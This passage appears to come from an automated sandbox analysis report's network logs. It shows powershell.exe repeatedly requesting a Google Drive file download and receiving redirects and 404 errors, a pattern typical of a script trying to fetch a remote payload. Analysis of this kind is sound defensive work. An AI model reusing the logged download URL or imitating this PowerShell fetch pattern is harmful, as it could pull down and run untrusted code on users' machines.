                                  Sep 30, 2024 10:00:01.118040085 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.507814884 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.508526087 CEST44357688142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:01.508588076 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:01.509030104 CEST57688443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525254965 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525310993 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:05.525363922 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525593996 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:05.525599957 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.165488005 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.168590069 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:06.168616056 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.543930054 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.544926882 CEST44357689142.250.186.174192.168.2.9
                                  Sep 30, 2024 10:00:06.547609091 CEST57689443192.168.2.9142.250.186.174
                                  Sep 30, 2024 10:00:06.547945976 CEST57689443192.168.2.9142.250.186.174
                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                   Sep 30, 2024 09:58:05.120583057 CEST | 50845 | 53 | 192.168.2.9 | 1.1.1.1
                                   Sep 30, 2024 09:58:05.127978086 CEST | 53 | 50845 | 1.1.1.1 | 192.168.2.9
                                   Sep 30, 2024 09:58:06.350341082 CEST | 55765 | 53 | 192.168.2.9 | 1.1.1.1
                                   Sep 30, 2024 09:58:06.357454062 CEST | 53 | 55765 | 1.1.1.1 | 192.168.2.9
                                   Sep 30, 2024 09:58:43.125422001 CEST | 53 | 64399 | 162.159.36.2 | 192.168.2.9
                                   Sep 30, 2024 09:58:43.676681995 CEST | 53 | 51190 | 1.1.1.1 | 192.168.2.9
                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                   Sep 30, 2024 09:58:05.120583057 CEST | 192.168.2.9 | 1.1.1.1 | 0x8482 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                   Sep 30, 2024 09:58:06.350341082 CEST | 192.168.2.9 | 1.1.1.1 | 0x3762 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                   Sep 30, 2024 09:58:00.435671091 CEST | 1.1.1.1 | 192.168.2.9 | 0x2749 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                   Sep 30, 2024 09:58:00.435671091 CEST | 1.1.1.1 | 192.168.2.9 | 0x2749 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                                   Sep 30, 2024 09:58:05.127978086 CEST | 1.1.1.1 | 192.168.2.9 | 0x8482 | No error (0) | drive.google.com | | 142.250.186.174 | A (IP address) | IN (0x0001) | false
                                   Sep 30, 2024 09:58:06.357454062 CEST | 1.1.1.1 | 192.168.2.9 | 0x3762 | No error (0) | drive.usercontent.google.com | | 142.250.186.33 | A (IP address) | IN (0x0001) | false
                                  • drive.google.com
                                  • drive.usercontent.google.com
                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   0 | 192.168.2.9 | 49707 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2024-09-30 07:58:05 UTC | 215 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                   2024-09-30 07:58:06 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:06 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'nonce-Uf1wfCmVDsAliC1v1wqsZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                   1 | 192.168.2.9 | 49708 | 142.250.186.33 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                   Timestamp | Bytes transferred | Direction | Data
                                   2024-09-30 07:58:07 UTC | 233 | OUT | GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: drive.usercontent.google.com
                                  Connection: Keep-Alive
                                   2024-09-30 07:58:07 UTC | 1913 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:07 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'nonce-465ryBlG48LPevoEgAOeSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Length: 1652
                                  X-GUploader-UploadID: AD-8ljsiWYEzLr6ofLG4ZMF1opB08n-7bb4fcPcr5gfQfkv8Q7apR4SWAxMAw87dLaD8xo-xRRUhJMqc5Q
                                  Server: UploadServer
                                  Set-Cookie: NID=517=Fwd1-JrhNgK2fQ1sYnKrSyAJOSipDf7bur8VNRR2nqooRmfHzu2mybb2CpYyUCU3RxthKHwVEaBfjEjzZyRUfPI4rv2G-tr65LSHnZ50WHBcIjjL__MRwYzW1_9ROTErH3wUquwj--GDmPhmMQP-Nuk_YALaRfkh_LADyFmBLlBsFXlpHA; expires=Tue, 01-Apr-2025 07:58:07 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-09-30 07:58:07 UTC | 1652 | IN | Data (ASCII): <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ck2OzTVwHEAXQcFplUiheA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.9 | 49709 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:12 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:12 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:12 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-fkNqqgnrnh5MUxM5WaQQgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.9 | 49710 | 142.250.186.33 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:13 UTC | 115 | OUT | GET /download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download HTTP/1.1
                                  Host: drive.usercontent.google.com
                                  2024-09-30 07:58:13 UTC | 1599 | IN | HTTP/1.1 404 Not Found
                                  Content-Type: text/html; charset=utf-8
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:13 GMT
                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-IAkb1jTGa-76829Rq6bNpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Length: 1652
                                  X-GUploader-UploadID: AD-8ljt2X2d3s5aCRN26rZwTl8JX2GCulcw5i7dFO9FfqP40lyli4Ai4X8sJKX_IXXZ3TNTLOE6GSoFXtw
                                  Server: UploadServer
                                  Set-Cookie: NID=517=Swf_zx8RlvwN2Z-DKnzCL6Th7r4KGyBckaTRQ4j4hHKJD8Skdkdf5oNJP_fzibaNy5KcwZeC49JzvoFLeBUS1pFhoOYDELm1v6wTkR-7f2Qz2kCidIiR-peuH20Tiev7fimlcJUFpCETwwqhpljN3flIiR_tdyBthPbYmtKIZUx_Z83LpQ; expires=Tue, 01-Apr-2025 07:58:13 GMT; path=/; domain=.google.com; HttpOnly
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Content-Security-Policy: sandbox allow-scripts
                                  Connection: close
                                  2024-09-30 07:58:13 UTC | 1599 | IN | Data (ASCII): <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NeDMw7H0P-grDDGEBU_ZcA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                  2024-09-30 07:58:13 UTC | 53 | IN | Data (ASCII):  this server. <ins>That’s all we know.</ins></main>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.9 | 49713 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:18 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:18 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:18 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-IJj80Ze_DGy3OWZ6jd4tfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.9 | 49715 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:23 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:23 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:23 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-plQKEOjcj8r3FXKT-QYw9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.9 | 49716 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:28 UTC | 97 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  2024-09-30 07:58:29 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:28 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-DsiyVmkonxv9meLW15_yrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.9 | 49718 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:33 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:34 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:33 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-BCvogfyFpRr9nsbzdDfP8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.9 | 49720 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:39 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:39 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:39 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Content-Security-Policy: script-src 'report-sample' 'nonce--I8hZ0DG-kPz9zAqtVaL_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.9 | 57668 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:44 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:44 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:44 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Cross-Origin-Opener-Policy: same-origin
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-8paJb31lFDlWyFpOxTFk7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.9 | 57671 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-09-30 07:58:49 UTC | 121 | OUT | GET /uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s HTTP/1.1
                                  Host: drive.google.com
                                  Connection: Keep-Alive
                                  2024-09-30 07:58:49 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                  Content-Type: application/binary
                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                  Pragma: no-cache
                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                  Date: Mon, 30 Sep 2024 07:58:49 GMT
                                  Location: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
                                  Strict-Transport-Security: max-age=31536000
                                  Content-Security-Policy: script-src 'report-sample' 'nonce-bHQDzG0-MtvLXbeDjppFJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                  Cross-Origin-Opener-Policy: same-origin
                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                  Server: ESF
                                  Content-Length: 0
                                  X-XSS-Protection: 0
                                  X-Frame-Options: SAMEORIGIN
                                  X-Content-Type-Options: nosniff
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.9 | 57672 | 142.250.186.174 | 443 | 7752 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Timestamp | Bytes transferred | Direction | Data
